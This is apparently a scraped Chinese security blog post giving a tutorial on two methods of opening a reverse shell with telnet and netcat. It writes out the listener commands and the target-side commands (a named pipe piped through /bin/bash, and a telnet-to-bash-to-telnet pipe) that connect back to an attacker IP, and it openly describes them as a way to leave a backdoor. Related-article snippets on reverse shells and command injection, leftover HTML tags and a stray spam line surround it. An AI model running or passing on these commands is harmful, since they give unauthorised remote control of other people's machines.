<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    windows反彈_利用telnet反彈shell的兩種方法

    VSole2022-03-22 06:58:54

    今天給大家介紹兩種telnet反彈shell的方法,相對于其他方式反彈shell要簡單一點,可作為按需遠程控制或留后門使用,希望可以幫助到大家。

    前提條件:目標機為linux系統并支持telnet服務;攻擊機支持telnet服務,攻擊機裝有NC (windows、linux均可)。

    這里我準備了一個公網服務器和一個本地虛擬機,公網服務器為攻擊機,虛擬機為目標機。

    攻擊機:

    目標機:

    下面給大家演示一下如何反彈shell:

    第一種:

    1. 攻擊機先執行監聽:nc -l 2222

    2. 目標機執行:mknod a p; telnet x.x.x.x 2222 0a (x.x.x.x為攻擊機ip)

    3. 攻擊機已經獲得shell(沒有提示),嘗試執行命令:

    第二種:

    1. 攻擊機需要開兩個終端分別監聽兩個端口:nc -l 6666,nc -l 5555

    2. 目標機執行:telnet x.x.x.x 6666 | /bin/bash | telnet x.x.x.x 5555 (x.x.x.x為攻擊機ip)

    3. 目標機已經獲得shell,嘗試執行命令(第一個終端執行命令會在第二個終端回顯):

    這就是利用telnet反彈shell的兩種方式,當然也不僅有這兩種,網上可以找到其他各種反彈的方式,不過原理都差不多。

    本次演示使用的兩個系統都是centos7,且近乎初始化的系統,演示是截圖這種效果。根據操作系統不同,有的系統獲取到shell或者被目標機telnet連接時是會有回顯的。

    shelltelnet
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    會話認證支持 SSH 自動執行。支持 XModem、YModem 和 ZModem。集成本地文件管理器,支持移動到、復制到、刪除、重命名、新建文件/目錄等。
    在一些開啟了 Hyper-V 的電腦上,RouterOS 可能無法在 VMWare Workstation 中模擬運行或啟動非常緩慢,如果遇到無法運行的情況,請酌情考慮關閉 Hyper-V,如果能成功運行但是啟動緩慢,可以及時拍攝快照。
    反彈Shell大全與原理
    2023-04-25 10:15:00
    reverse shelltelnet,ssh等標準shell對應,本質上是網絡概念的客戶端與服務端的角色反轉。對方主機在局域網內,從外網無法直接訪問。對方主機上存在WAF,對主動連接發來的請求數據檢測嚴格,而對向外發出的請求不進行檢測或檢測較少。對方由于防火墻等限制,對方機器只能發送請求,不能接收請求。在滲透測試過程中,得到webshell后一般我們會反彈shell。反彈shell原理A主機開啟9090端口的tcp服務
    反彈shell匯總
    2021-07-28 10:01:11
    反彈shell匯總
    本地提示登錄嘗試更改uboot啟動參數時,uboot設置了密碼。固件0xF40000位置使用dd命令分割固件,將該區域的文件系統文件使用binwalk解壓后,可得到以下文件系統內容。根文件系統結構在根文件系統下搜索”boot.sh”,確定boot.sh會在開機啟動。
    今天給大家介紹兩種telnet反彈shell的方法,相對于其他方式反彈shell要簡單一點,可作為按需遠程控制或留后門使用,希望可以幫助到大家。
    0x10 前言對前一段時間發現的幾個命令注入漏洞做下記錄:CVE-2022-28571 && CVE-2022-28572 CVE-2022-28571 這個漏洞的產生是因為Telnetd參數過濾不完整導致的,由于需要知道密碼所以比較雞肋,類似于授權后的命令注入,發現的過程很有意思,這篇文章主要介紹這個漏洞。
    0x20 漏洞分析首先我們要知道,這個參數一定是從 web 端傳入進來的。這個文件里面 而在這個文件里面我們發現set_sntp_cfg?通過對這個函數的分析我們發現他又調用了tp_sntp_handle?這個函數,而這個函數的實現是在libtpi.so?至此我們就找到了漏洞最終執行的地方了
    聲明:本人堅決反對利用文章內容進行惡意攻擊行為,一切錯誤行為必將受到懲罰,綠色網絡需要靠我們共同維護,推薦大
    很早就想專門寫一篇關于內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段:)
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类